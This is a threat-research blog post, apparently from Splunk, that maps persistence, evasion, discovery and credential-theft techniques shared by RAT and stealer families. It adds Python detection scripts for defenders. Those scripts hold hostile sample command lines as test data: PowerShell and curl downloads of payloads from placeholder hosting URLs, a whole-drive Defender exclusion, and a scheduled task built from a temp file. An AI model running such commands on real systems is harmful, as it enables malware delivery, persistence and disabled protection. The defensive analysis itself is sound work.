A Shared Arsenal: Identifying Common TTPs Across RATs
Modern malware rarely operates in isolation. Behind the scenes, many information stealers and Remote Access Trojans (RATs) share strikingly similar MITRE ATT&CK Tactics, Techniques and Procedures (TTPs), and those overlaps are valuable for defense and incident response.
In this blog, the Splunk Threat Research Team (STRT) explores the similarities across malware families we observed or have been reported in the wild across the years, mapped through the MITRE ATT&CK framework to highlight recurring TTPs. We will uncover patterns that reveal how threat actors achieve persistence, evade defenses, and exfiltrate data at scale. In addition to these shared techniques, we also document unique and lesser-seen TTPs that may indicate evolving tradecraft or specialized tooling, helping distinguish specific malware families and providing security analysts and blue teamers with clearer guidance during investigations.
The Landscape: A Shared Arsenal
We investigated around 18 distinct malware families to identify overlapping behaviors. While these tools are sold or distributed by different groups, their operational playbooks are often nearly identical. So, let’s start with some statistics gathered from our own research and publicly reported data.
The Common TTPs – Technique Overlap
To establish a baseline, we first examined technique-level overlap, using a combination of internal and publicly reported research. This analysis focuses strictly on what techniques are used, without yet considering how those techniques are implemented.
Chart: MITRE ATT&CK technique overlap across the analyzed families, counted per technique
This data demonstrates that while malware families may differ in implementation details, they largely collapse into a common behavioral pattern at the technique level. Let us take a look at some examples.
Ingress Tool Transfer – T1105
Ingress Tool Transfer is the most common technique across these families. In practice it means the malware has the ability to “download” additional payloads, stages or files onto the compromised host.
When you think about it, it makes sense that this is the most “common” technique for this type of threat.
System Information Discovery – T1082
System Information Discovery comes second, and here these malware families often aim to collect information such as the computer's name, OS, Memory, etc. Examples include:
- PlugX variants used a command called “GetSystemInfo” to collect extensive information about machines.
- AgentTesla used Windows Management Instrumentation (WMI) for system information discovery:
Start iwbemservices::execquery -select * from win32_operatingsystem
Start iwbemservices::execquery -select * from win32_processor
Application Layer Protocol: Web Protocols – T1071.001
Another common theme is the use of web protocols such as HTTP for command-and-control (C2) communications, as reported by [1][2] and others.
For defenders, this reinforces the value of “technique-centric” detection strategies over a hash-based or IOC approach, as a small set of well-covered techniques can provide visibility across a broad threat scope.
However, while technique-level aggregation provides a useful starting point for identifying overlap, it can only offer a high-level view of adversary behavior. Different malware families may share the same technique but could use different implementations at the procedure level, which is where detections are often built.
It is also worth noting that at this basic level of aggregation the data is somewhat skewed: a technique used by only a single family still counts toward overall usage, which is not necessarily what we want.
To avoid this and capture more detection-oriented detail, we extend the analysis and examine common implementations across these families.
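The technique-level aggregation described above is easy to reproduce. The script below is an added illustration, not STRT’s tooling or dataset: it takes a constructed family-to-technique mapping (illustrative assumptions built from the technique IDs named in this post, not the full 18-family data), ranks techniques by how many families use them, separates the single-family techniques that skew the totals, and adds pairwise Jaccard overlap so that families with near-identical playbooks stand out.

```python
from collections import Counter
from itertools import combinations

# Constructed sample: a handful of families with ATT&CK technique IDs named in
# this post. The assignments are illustrative, not STRT's measured data.
FAMILY_TECHNIQUES = {
    "AgentTesla":  {"T1105", "T1082", "T1071.001", "T1547.001", "T1053.005"},
    "Quasar RAT":  {"T1105", "T1082", "T1071.001", "T1547.001"},
    "Phemedrone":  {"T1105", "T1082", "T1590.005", "T1555.003"},
    "Meduza":      {"T1105", "T1590.005", "T1555.003", "T1102"},
    "DarkCrystal": {"T1105", "T1071.001", "T1053.005", "T1497.003"},
    "NJRAT":       {"T1105", "T1082", "T1547.001", "T1561.002"},
}


def technique_prevalence(families):
    """Count how many families use each technique (the technique-level view)."""
    counts = Counter()
    for techniques in families.values():
        counts.update(techniques)
    return counts


def shared_techniques(families, min_families=2):
    """Drop techniques seen in fewer than min_families families (the singleton skew)."""
    return {t: n for t, n in technique_prevalence(families).items() if n >= min_families}


def unique_techniques(families):
    """Techniques used by exactly one family: candidates for family-specific detections."""
    counts = technique_prevalence(families)
    return {t: next(f for f, ts in families.items() if t in ts)
            for t, n in counts.items() if n == 1}


def jaccard(a, b):
    """Set similarity in [0, 1]: 1.0 means identical technique sets."""
    return len(a & b) / len(a | b)


def pairwise_overlap(families):
    """Jaccard similarity of technique sets for every family pair, highest first."""
    pairs = {(f1, f2): jaccard(families[f1], families[f2])
             for f1, f2 in combinations(sorted(families), 2)}
    return sorted(pairs.items(), key=lambda kv: kv[1], reverse=True)


if __name__ == "__main__":
    for tech, n in technique_prevalence(FAMILY_TECHNIQUES).most_common():
        print(f"{tech:<10} used by {n} families")
    print("unique:", unique_techniques(FAMILY_TECHNIQUES))
    print("closest pair:", pairwise_overlap(FAMILY_TECHNIQUES)[0])
```

The `shared_techniques` filter is the fix for the skew mentioned above, and `unique_techniques` is the starting list for the family-specific TTPs covered later in this post.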
The Common TTPs – A Focus on Procedures
To inform detections, the following sections focus on how common techniques are executed/implemented in practice.
System Information Discovery - T1082
3 out of 18 of these malware families abused Windows Management Instrumentation (WMI) queries for system information discovery as part of their beacon communication to the command-and-control server.
This data commonly helps the attacker to identify and differentiate the posture and structure of the compromised host or system.
We’ve seen an example of AgentTesla in the previous section. The figure below shows the list of WMI commands used by Quasar RAT for its system information discovery.
Figure 1: Quasar RAT System Information Discovery
Figure 2: System Information Discovery Commonalities
Gather Victim Network Information - T1590.005
7 out of the 17 malware families analyzed by STRT were observed collecting network-related information, such as the public IP address, geographic location, and other metadata, by querying external IP-lookup web services.
For example, Figure 3 shows a screenshot of the system-information-gathering routines used by the Phemedrone malware family. Within its GetGeoInformation() method, the malware contacts the web service hxxp[://]ip-api[.]com/json/?fields=11827 to retrieve geolocation data and associated details from the compromised host.
Figure 3: Phemedrone System Information Discovery
Another example is the Meduza Stealer. Figure 4 shows the function responsible for initializing the web service it uses to gather network-related information. In this case, the malware queries hxxps[:]//api[.]ipify[.]org to obtain the public IP address of the compromised system.
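The two discovery procedures above (WMI queries for OS and CPU details, and lookups of public-IP/geolocation services) are more telling together than apart. The following is an added detection example, not code from STRT or from any of the malware families: it groups constructed WMI-query and DNS telemetry by process and scores a process that does both, or does either from a binary outside the usual program directories. The domain list contains the two services named above plus two further lookup services as an assumed extension; the event shape and field names are assumptions for the example.

```python
import re
from collections import defaultdict

# IP / geolocation lookup services: the two named in this post plus two more
# common ones (constructed list; extend it from your own telemetry).
IP_LOOKUP_DOMAINS = {"ip-api.com", "api.ipify.org", "ipinfo.io", "checkip.amazonaws.com"}

# WMI classes a host-profiling routine typically reads; the first two are the
# ones shown in the AgentTesla trace earlier in this post.
SYSINFO_WMI_CLASSES = {"win32_operatingsystem", "win32_processor",
                       "win32_computersystem", "win32_videocontroller"}

# Directories legitimate software normally runs from; anything else is "unusual".
TRUSTED_DIR_RE = re.compile(r"^[A-Z]:\\(Windows|Program Files( \(x86\))?)\\", re.I)
WQL_FROM_RE = re.compile(r"\bfrom\s+([A-Za-z0-9_]+)", re.I)

# Constructed telemetry: WMI query traces (as an EDR/sandbox API hook would
# record them) and DNS lookups (as a Sysmon event 22 would record them).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Users\victim\AppData\Roaming\svc.exe",
     "kind": "wmi_query", "data": "select * from win32_operatingsystem"},
    {"pid": 4120, "image": r"C:\Users\victim\AppData\Roaming\svc.exe",
     "kind": "wmi_query", "data": "SELECT * FROM Win32_Processor"},
    {"pid": 4120, "image": r"C:\Users\victim\AppData\Roaming\svc.exe",
     "kind": "dns_query", "data": "ip-api.com"},
    {"pid": 2210, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "kind": "dns_query", "data": "ipinfo.io"},
    {"pid": 1550, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "kind": "wmi_query", "data": "select * from win32_bios"},
]


def profile_processes(events):
    """Group the discovery-relevant observations by process id."""
    profiles = defaultdict(lambda: {"image": None, "wmi": set(), "lookups": set()})
    for ev in events:
        p = profiles[ev["pid"]]
        p["image"] = ev["image"]
        if ev["kind"] == "wmi_query":
            m = WQL_FROM_RE.search(ev["data"])
            if m and m.group(1).lower() in SYSINFO_WMI_CLASSES:
                p["wmi"].add(m.group(1).lower())
        elif ev["kind"] == "dns_query" and ev["data"].lower() in IP_LOOKUP_DOMAINS:
            p["lookups"].add(ev["data"].lower())
    return profiles


def score_discovery(events):
    """Return {pid: severity}. Both behaviours from one process is the stealer/RAT
    pattern; a single behaviour is graded by where the binary runs from."""
    findings = {}
    for pid, p in profile_processes(events).items():
        sysinfo, lookup = bool(p["wmi"]), bool(p["lookups"])
        if not (sysinfo or lookup):
            continue
        untrusted = not TRUSTED_DIR_RE.match(p["image"])
        if sysinfo and lookup:
            findings[pid] = "high"
        elif untrusted:
            findings[pid] = "medium"
        else:
            findings[pid] = "low"
    return findings


if __name__ == "__main__":
    print(score_discovery(SAMPLE_EVENTS))
```

A browser resolving a lookup service is ordinary user behaviour, which is why the firefox.exe event is graded low; the same lookup from an executable in a roaming profile that has just enumerated the OS and CPU is the combination worth alerting on.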
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - T1547.001
The use of the Windows Registry Run keys to maintain persistence has been a common theme across these families. By adding entries to these Run keys, the malware ensures it automatically starts each time the infected system reboots. This technique is favored by attackers because it is simple, reliable, and often overlooked by basic security tools.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
AgentTesla, on the other hand, creates Registry RunOnce keys using VBScript to maintain persistence on compromised hosts.
AgentTesla also modifies the registry to ensure execution upon user logon by adding a value under the HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows key. The Load value points to a malicious shortcut located in the %TEMP% directory:
Figure 6: Registry Run Keys Persistence Commonalities
Scheduled Task/Job: Scheduled Task - T1053.005
The same set of malware families also leverages schtasks.exe to create scheduled tasks, enabling persistence and sometimes privilege escalation on compromised systems. As shown in Figure 7 below, the code snippet from the Dark Crystal RAT demonstrates how this malware uses the Windows schtasks.exe utility to establish a scheduled task, a technique STRT also observed in several other RAT families such as AsyncRAT.
Figure 7: DarkCrystal Creation of Scheduled Task via Schtasks.exe
Figure 8: AsyncRAT Creation of Scheduled Task via Schtasks.exe
SentinelOne also documented an additional persistence mechanism used by AgentTesla that leverages scheduled tasks and registry modification. In this technique, the malware creates a scheduled task using schtasks.exe with an XML configuration file stored in the temporary directory, allowing more granular control over task settings and execution behavior:
Schtasks.exe /Create /TN "UpdatesxjZWstBWrIuw" /XML C:\Usersxxxxxx\AppData\Local\Temp\tmp1718.tmp"
Figure 9: Scheduled Tasks Commonalities
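Both persistence procedures in the two sections above (Run/RunOnce key values and the Windows NT\CurrentVersion\Windows\Load value, and schtasks.exe task creation from an XML file in the temporary directory) can be checked with the same path heuristic: the autostart entry points into a location an unprivileged user can write to. The code below is an added example, not STRT’s or ESCU’s detection logic; the registry and process records are constructed in the shape of Sysmon events 13 and 1, and the task and file names are placeholders.

```python
import re

RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\[^\\]+$", re.I)
LOAD_VALUE_RE = re.compile(r"\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load$", re.I)
# Locations an unprivileged user can write to; autostart entries here are suspicious.
USER_WRITABLE_RE = re.compile(r"\\(AppData\\(Local|Roaming)|Temp|Users\\Public|ProgramData)\\", re.I)
SCHTASKS_CREATE_RE = re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)
SCHTASKS_ARG_RE = re.compile(r"/(xml|tr)\s+(\"[^\"]*\"|\S+)", re.I)

# Constructed telemetry shaped like Sysmon event 13 (registry value set) and
# event 1 (process creation); all values and names are made up for the example.
SAMPLE_EVENTS = [
    {"type": "reg_set", "image": r"C:\Users\victim\AppData\Roaming\svc.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\victim\AppData\Roaming\svc.exe"},
    {"type": "reg_set", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load",
     "details": r"C:\Users\victim\AppData\Local\Temp\update.lnk"},
    {"type": "reg_set", "image": r"C:\Windows\System32\SecurityHealthSystray.exe",
     "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "details": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    {"type": "proc", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN "UpdatesEXAMPLE" /XML "C:\Users\victim\AppData\Local\Temp\tmpEXAMPLE.tmp"'},
    {"type": "proc", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe" /sc daily'},
]


def check_registry(ev):
    """T1547.001: Run-key values into user-writable paths, or any Windows\\Load value."""
    if LOAD_VALUE_RE.search(ev["target"]):
        # The Windows\Load value is rarely set legitimately; flag it regardless of path.
        return ("T1547.001", "Windows\\Load value set", ev["details"])
    if RUN_KEY_RE.search(ev["target"]) and USER_WRITABLE_RE.search(ev["details"]):
        return ("T1547.001", "Run key points into user-writable path", ev["details"])
    return None


def check_schtasks(ev):
    """T1053.005: task created from an XML file or action located in a user-writable path."""
    cmd = ev["cmdline"]
    if not SCHTASKS_CREATE_RE.search(cmd):
        return None
    for opt, val in SCHTASKS_ARG_RE.findall(cmd):
        val = val.strip('"')
        if USER_WRITABLE_RE.search(val):
            return ("T1053.005", f"schtasks /{opt.upper()} from user-writable path", val)
    return None


def find_persistence(events):
    """Run both checks over a mixed event stream and collect the hits."""
    findings = []
    for ev in events:
        hit = check_registry(ev) if ev["type"] == "reg_set" else check_schtasks(ev)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for technique, reason, detail in find_persistence(SAMPLE_EVENTS):
        print(technique, reason, "->", detail)
```

The benign Run value written by a System32 binary and the backup task pointing into Program Files fall through both checks, which keeps the rule usable on a fleet where software installers write Run keys all day.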
Impair Defenses: Disable or Modify Tools - T1562.001
As part of their defense-evasion techniques, 5 out of the 17 analyzed malware families attempt to weaken Windows Defender by adding exclusion rules for the malware’s file path on the compromised host, which allows them to avoid antivirus detection.
For example, Figure 10 shows ValleyRAT code that uses PowerShell to exclude the entire C:\ drive from Windows Defender’s scanning scope.
Figure 10: Add File Path in Windows Defender Exclusion Path
Figure 11: Disable Modify Tools Commonalities
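A practical way to turn the exclusion behaviour above into a detection is to parse the PowerShell command line, pull out every value passed to the Defender exclusion parameters, and grade how broad each one is, with a whole-drive exclusion like ValleyRAT’s at the top. The parser below is an added example, not STRT’s or ValleyRAT’s code. It relies on the real `Add-MpPreference` / `Set-MpPreference` cmdlets and their `-ExclusionPath`, `-ExclusionProcess` and `-ExclusionExtension` parameters; the sample command lines are constructed and do not handle `-EncodedCommand` payloads, which would need decoding first.

```python
import re

MP_CMDLET_RE = re.compile(r"\b(Add|Set)-MpPreference\b", re.I)
# Each exclusion parameter and its value list, up to the next -Parameter or end of command.
MP_PARAM_RE = re.compile(
    r"-(ExclusionPath|ExclusionProcess|ExclusionExtension)\s+(.+?)(?=\s+-[A-Za-z]|\s*[;|]|\s*$)",
    re.I | re.S)
DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")
USER_WRITABLE_RE = re.compile(r"\\(Users|AppData|Temp|ProgramData|Public)\\", re.I)
BROAD_EXTENSIONS = {"exe", "dll", "ps1", "bat", "vbs", "js"}

# Constructed process command lines for the example.
SAMPLE_CMDLINES = [
    r'powershell.exe -nop -w hidden -c "Add-MpPreference -ExclusionPath C:\"',
    r'powershell Set-MpPreference -ExclusionPath "C:\Users\victim\AppData\Roaming", "C:\ProgramData\svc" -Force',
    r'powershell -c "Add-MpPreference -ExclusionExtension exe -ExclusionProcess svc.exe"',
    r"powershell Get-MpPreference",
]


def parse_exclusions(cmdline):
    """Return [(parameter, value), ...] for every exclusion the command line adds."""
    if not MP_CMDLET_RE.search(cmdline):
        return []
    out = []
    for param, raw in MP_PARAM_RE.findall(cmdline):
        for value in raw.split(","):          # PowerShell arrays: a, b, c
            value = value.strip().strip("'\"")
            if value:
                out.append((param, value))
    return out


def severity(param, value):
    """Grade how much scanning coverage a single exclusion removes."""
    param = param.lower()
    if param == "exclusionpath" and DRIVE_ROOT_RE.match(value):
        return "critical"   # whole drive excluded, as in the ValleyRAT example
    if param == "exclusionextension" and value.lstrip(".").lower() in BROAD_EXTENSIONS:
        return "high"       # every executable-type file on the host
    if param == "exclusionpath" and USER_WRITABLE_RE.search(value):
        return "high"       # exactly where droppers land
    return "medium"


def assess_defender_exclusions(cmdline):
    return [(p, v, severity(p, v)) for p, v in parse_exclusions(cmdline)]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(assess_defender_exclusions(line))
```

Administrators do add exclusions legitimately, so the "medium" grade is a triage bucket rather than an alert; the critical and high grades are the ones that rarely have a business reason behind them.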
Access Token Manipulation: Create Process with Token - T1134.002
5 out of 18 malware families manipulate their process token to gain greater control over other processes on the system. The privilege involved, SeDebugPrivilege, is normally granted only to administrators or system-level services because it allows a process to inspect, open, and modify any other process, including those running as SYSTEM.
Figure 12 shows a screenshot of the ValleyRAT code responsible for adjusting the token privileges of its own process. Specifically, it enables SeDebugPrivilege, allowing the malware to obtain elevated access and exert greater control over other processes on the system.
Figure 12: Adjust Process Token Privilege
Figure 13: Adjust Process Token Commonalities
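On the host side, enabling SeDebugPrivilege on a token is recorded by Windows Security event 4703 (“A user right was adjusted”), but that event is noisy because service hosts and management tools adjust privileges constantly. The triage function below is an added example, not STRT’s or ValleyRAT’s code: it keeps only sensitive-privilege enables performed by binaries outside the trusted program directories. The records are constructed, and the field names (EnabledPrivilegeList, ProcessName, SubjectUserName) are assumed to follow the event’s XML schema.

```python
import re

TRUSTED_IMAGE_RE = re.compile(
    r"^[A-Z]:\\(Windows\\(System32|SysWOW64)|Program Files( \(x86\))?)\\", re.I)

# Privileges whose enablement by an unexpected binary deserves a look.
SENSITIVE_PRIVILEGES = {"SeDebugPrivilege", "SeTcbPrivilege",
                        "SeLoadDriverPrivilege", "SeImpersonatePrivilege"}

# Constructed records shaped like event 4703; "-" is how the event renders an empty list.
SAMPLE_4703 = [
    {"SubjectUserName": "victim",
     "ProcessName": r"C:\Users\victim\AppData\Local\Temp\vr.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege", "DisabledPrivilegeList": "-"},
    {"SubjectUserName": "SYSTEM",
     "ProcessName": r"C:\Windows\System32\svchost.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege", "DisabledPrivilegeList": "-"},
    {"SubjectUserName": "victim",
     "ProcessName": r"C:\Users\victim\Desktop\tool.exe",
     "EnabledPrivilegeList": "SeShutdownPrivilege", "DisabledPrivilegeList": "-"},
]


def enabled_privileges(record):
    """The event lists privileges separated by whitespace/newlines; normalise to a set."""
    parts = re.split(r"[\s,]+", record["EnabledPrivilegeList"])
    return {p for p in parts if p and p != "-"}


def triage_privilege_events(records):
    """Sensitive privilege enables from binaries outside trusted directories."""
    hits = []
    for r in records:
        sensitive = enabled_privileges(r) & SENSITIVE_PRIVILEGES
        if sensitive and not TRUSTED_IMAGE_RE.match(r["ProcessName"]):
            hits.append((r["ProcessName"], sorted(sensitive), r["SubjectUserName"]))
    return hits


if __name__ == "__main__":
    for image, privs, user in triage_privilege_events(SAMPLE_4703):
        print(user, image, privs)
```

The svchost.exe record is dropped by the path allow-list and the Desktop tool by the privilege list; what remains is the pattern in Figure 12, a user-profile binary switching on SeDebugPrivilege.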
Credentials from Web Browsers - T1555.003
11 of these malware families also target and decrypt sensitive credentials stored in browser databases. With this technique, attackers harvest and exfiltrate valuable information from infected systems, significantly compromising user privacy and security.
Figure 14 displays a de-obfuscated Python script from Braodo malware, which demonstrates how credentials are extracted from popular web browsers.
Figure 14: Braodo Stealing Sensitive Browser Information
Figure 15: Credentials from Web Browsers Commonalities
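Whatever language the stealer is written in (Braodo’s is Python, as Figure 14 shows), it has to open the browser’s credential store on disk, which gives defenders a file-access signal that is independent of the sample. The function below is an added example, not STRT’s or Braodo’s code: it flags non-browser processes reading well-known Chromium and Firefox credential files. The file-access records are constructed, and the list of store names is a starting point rather than a complete inventory.

```python
import re

# Credential and cookie stores of Chromium-based browsers and Firefox
# (constructed list of well-known file names, not an exhaustive inventory).
BROWSER_STORE_RE = re.compile(
    r"\\(Google\\Chrome|Microsoft\\Edge|BraveSoftware\\Brave-Browser|Chromium)\\User Data\\.*\\(Login Data|Cookies|Web Data)$"
    r"|\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(logins\.json|key4\.db|cookies\.sqlite)$",
    re.I)
# The browsers themselves are expected to open their own stores.
BROWSER_IMAGE_RE = re.compile(r"\\(chrome|msedge|brave|chromium|firefox)\.exe$", re.I)

# Constructed file-access telemetry (as an EDR file-open record would show it).
SAMPLE_FILE_EVENTS = [
    {"image": r"C:\Users\victim\AppData\Local\Temp\py\python.exe",
     "path": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Users\victim\AppData\Local\Temp\py\python.exe",
     "path": r"C:\Users\victim\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release\logins.json"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Users\victim\AppData\Local\Temp\py\python.exe",
     "path": r"C:\Users\victim\Documents\notes.txt"},
]


def browser_store_access(events):
    """Non-browser processes reading browser credential stores, grouped by image."""
    hits = {}
    for ev in events:
        if BROWSER_STORE_RE.search(ev["path"]) and not BROWSER_IMAGE_RE.search(ev["image"]):
            hits.setdefault(ev["image"], []).append(ev["path"])
    return hits


def count_distinct_stores(hits):
    """One process touching stores of several browsers looks like a stealer, not a backup job."""
    return {image: len(paths) for image, paths in hits.items()}


if __name__ == "__main__":
    for image, paths in browser_store_access(SAMPLE_FILE_EVENTS).items():
        print(image, "->", len(paths), "store(s)")
```

Backup agents and profile-sync tools will show up here too, so the count across browsers and the process path (a Python interpreter unpacked into %TEMP%) are what separate a stealer from a scheduled backup.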
Web Service - T1102
6 of these malware families abuse legitimate web services either as their command-and-control infrastructure or as remote storage locations for updated payloads that are later retrieved by their stagers or loaders.
Figure 16 shows a dataset of URLs related to Redline Stealer in which legitimate web services are being abused as C2 servers.
Figure 16: Abused Legitimate web services by Redline Stealer
Figure 17 shows the de-obfuscated batch script loader for Braodo Stealer. The script contains a PowerShell command that downloads the actual Braodo Stealer payload from either GitLab or Dropbox, both of which are abused as hosting services by the malware.
Figure 17: Braodo Obfuscated Loader
Figure 18: Web Services Commonalities
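Because the hosting services in this section are legitimate, blocking the domains is rarely an option; the useful signal is the combination of such a domain with a download primitive in a script host’s command line, which is what the Braodo loader in Figure 17 looks like in process telemetry. The classifier below is an added example, not STRT’s or Braodo’s code. The domain list contains the two services named above (GitLab, Dropbox) plus GitHub and the Discord CDN as an assumed extension, and the process records are constructed with placeholder URL paths.

```python
import re

# Hosting services named in this post plus two further common ones (constructed
# list; extend it from your own data). Matched on the exact host or a subdomain.
HOSTING_DOMAINS = ("gitlab.com", "dropbox.com", "dropboxusercontent.com",
                   "github.com", "raw.githubusercontent.com", "cdn.discordapp.com")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s'\"]*", re.I)
# Built-in ways to fetch a file from a command line.
DOWNLOAD_PRIMITIVE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b"
    r"|\bcurl\b|certutil.*-urlcache|bitsadmin.*/transfer", re.I)
SCRIPT_HOST_RE = re.compile(r"\\(powershell|pwsh|cmd|wscript|cscript|mshta)\.exe$", re.I)

# Constructed (image, command line) pairs; URL paths are placeholders.
SAMPLE_PROCS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://gitlab.com/EXAMPLE/loader/-/raw/main/s.txt')\""),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"\"C:\Program Files\Google\Chrome\Application\chrome.exe\" https://www.dropbox.com/s/EXAMPLE/report.pdf"),
    (r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c curl -s -o %TEMP%\p.exe https://www.dropbox.com/scl/fi/EXAMPLE?dl=1"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell Get-Date"),
]


def is_hosting_domain(domain):
    return any(domain == h or domain.endswith("." + h) for h in HOSTING_DOMAINS)


def classify_download(image, cmdline):
    """Return (severity, [hosting domains]) for a process creation, or None."""
    domains = [d.lower() for d in URL_RE.findall(cmdline)]
    hosted = [d for d in domains if is_hosting_domain(d)]
    if not hosted:
        return None
    primitive = bool(DOWNLOAD_PRIMITIVE_RE.search(cmdline))
    script_host = bool(SCRIPT_HOST_RE.search(image))
    if primitive and script_host:
        return ("high", hosted)      # loader-style fetch from a script interpreter
    if primitive or script_host:
        return ("medium", hosted)
    return ("low", hosted)           # e.g. a browser simply opening a share link


if __name__ == "__main__":
    for image, cmd in SAMPLE_PROCS:
        print(classify_download(image, cmd))
```

Matching on the exact host or a subdomain (rather than a plain suffix) is deliberate: a suffix check would also accept a look-alike registered domain that merely ends in the service name.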
The Unique TTPs – We Are Not the Same
Beyond their commonalities, each of these families also brings a somewhat unique set of TTPs or implementations. This section highlights unique TTPs observed across this set of malware families.
Disk Wipe: Disk Structure Wipe - T1561.002
NJRAT, also known as “Bladabindi,” is a well-known Remote Access Trojan (RAT) designed to collect and steal sensitive information from targeted or compromised systems. Interestingly, STRT identified a unique technique in one variant that could overwrite the Master Boot Record (MBR) of the Windows operating system.
Figure 19: NJRAT Master Boot Record Wiper Payload
Virtualization/Sandbox Evasion: Time Based Checks - T1497.003
The STRT identified an interesting TTP associated with DarkCrystal RAT: the use of the “W32tm” command with the “stripchart” parameter as an execution-delay mechanism for both runtime and beaconing activities. This command is rarely used by typical users or legitimate applications in a production environment, making it a strong behavioral pivot point for detecting potential DarkCrystal RAT activity.
Figure 20: DarkCrystal RAT Time Based Delay Technique
Like DarkCrystal RAT, AsyncRAT uses a similar technique, leveraging the “timeout” command in a batch script to delay removal of its malware sample from the %TEMP% folder.
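The two delay primitives above are easy to rank once the command line is parsed: `w32tm /stripchart` pointed at the local machine produces no useful time data (its only effect is the wait, which is `/period` times `/samples` seconds), and a `timeout` that is immediately followed by deleting a file from %TEMP% is the AsyncRAT clean-up pattern. The code below is an added example, not STRT’s or either RAT’s code; the command lines are constructed with placeholder file names, and the assumed default of 2 seconds for a missing `/period` follows the w32tm documentation.

```python
import re

W32TM_RE = re.compile(r"\bw32tm(\.exe)?\s+/stripchart\b", re.I)
W32TM_OPT_RE = re.compile(r"/(period|samples):(\d+)", re.I)
W32TM_TARGET_RE = re.compile(r"/computer:(\S+)", re.I)
TIMEOUT_RE = re.compile(r"\btimeout(\.exe)?\s+(?:/t\s+)?(\d+)", re.I)
SELF_DELETE_RE = re.compile(r"\b(del|erase)\s+.*\\(Temp|AppData)\\", re.I)
LOCAL_TARGETS = {"localhost", "127.0.0.1", "::1"}

# Constructed command lines for the example.
SAMPLE_CMDLINES = [
    # DarkCrystal-style delay: poll the local clock for samples * period seconds
    r"w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:7",
    # AsyncRAT-style batch: wait, then remove the dropped sample from %TEMP%
    r'cmd.exe /c timeout 3 & del "C:\Users\victim\AppData\Local\Temp\EXAMPLE.exe"',
    # Benign administrative use: checking offset against a real time source
    r"w32tm /stripchart /computer:time.windows.com /samples:3",
    r"cmd.exe /c echo done",
]


def estimate_delay_seconds(cmdline):
    """Seconds the command stalls for; inf if it never stops; None if not a delay."""
    if W32TM_RE.search(cmdline):
        opts = {k.lower(): int(v) for k, v in W32TM_OPT_RE.findall(cmdline)}
        if "samples" not in opts:
            return float("inf")          # stripchart runs until interrupted
        return opts.get("period", 2) * opts["samples"]   # documented default period: 2 s
    m = TIMEOUT_RE.search(cmdline)
    if m:
        return int(m.group(2))
    return None


def classify_delay(cmdline):
    """Return (severity, reason, seconds) or None."""
    delay = estimate_delay_seconds(cmdline)
    if delay is None:
        return None
    if W32TM_RE.search(cmdline):
        target = W32TM_TARGET_RE.search(cmdline)
        local = bool(target) and target.group(1).lower() in LOCAL_TARGETS
        # Polling the local clock yields nothing useful; its only effect is the wait.
        return ("high" if local else "low", "w32tm /stripchart", delay)
    if SELF_DELETE_RE.search(cmdline):
        return ("high", "timeout followed by delete in temp", delay)
    return ("low", "timeout", delay)


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(classify_delay(line))
```

The estimated delay is worth keeping in the alert: a sandbox with a short execution budget will time out before a 35-second stall ends, which is exactly why the technique works against automated analysis.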
Bypass User Account Control - T1548.002
Among the other RATs and Trojan stealers, Castle RAT stands out for its use of the AppInfo RPC service UUID to bypass Windows User Account Control (UAC). This technique enables the malware to launch its payload using a process handle taken from a trusted Windows binary (ComputerDefaults.exe), granting it elevated privileges without triggering UAC prompts.
Figure 21: UAC Bypassed Using AppInfo RPC Server UUID
Impair Defenses: Disable or Modify Tools - T1562.001
One notable TTP observed in Redline Stealer is its modification of registry keys and disabling of services responsible for Windows Update on the compromised host. This technique is particularly interesting because it helps the malware maintain persistence, reduces the likelihood of security patches being applied, and increases the attacker’s window of opportunity to operate undetected.
Figure 22: Disable Windows Update
In the previous sections, we showed that while these malware families may differ in name or origin, they often share a degree of behavioral overlap that we can focus on to get the best return in terms of detection coverage.
At the same time, we must keep in mind that these families are not “identical”; each brings its own unique TTPs and implementation details. These differences are often just as valuable to pursue, as they can help distinguish between families during investigations and expose more specialized or evolving tradecraft.
ESCU already provides many detections covering the TTPs we’ve discussed in this blog. Please do check out the “Appendix: Splunk Threat Research Team Blog References” section that references the different analytic stories and their linked detections.
